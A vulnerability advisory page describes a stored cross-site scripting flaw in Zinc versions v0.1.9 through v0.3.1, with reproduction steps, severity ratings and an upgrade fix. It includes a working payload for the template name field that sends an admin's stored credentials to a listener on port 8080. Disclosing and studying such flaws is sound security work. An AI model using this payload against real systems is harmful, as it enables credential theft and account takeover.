Mend Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: October 6, 2022
PoC Details1. Log in to the application as a user and create a new template.
2. Enter the XSS payload provided in the PoC section below in the template name field, fill in the other fields, and save the template.
3. Start a listener on port 8080 to receive the victim's credentials.
4. Now login as an admin user and navigate to the created template.
5. Under the actions tab, click on the delete button.
"><img src=x onerror=this.a=window.location.href.slice(0,7);this.src=this.a+'127.0.0.1:8080'+this.a+'x='+localStorage.getItem("creds")>
Affected EnvironmentsZinc versions v0.1.9 through v0.3.1
PreventionUpgrade to zinc version v0.3.2
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privileges Required (PR):||Low|
|User Interaction (UI):||Required|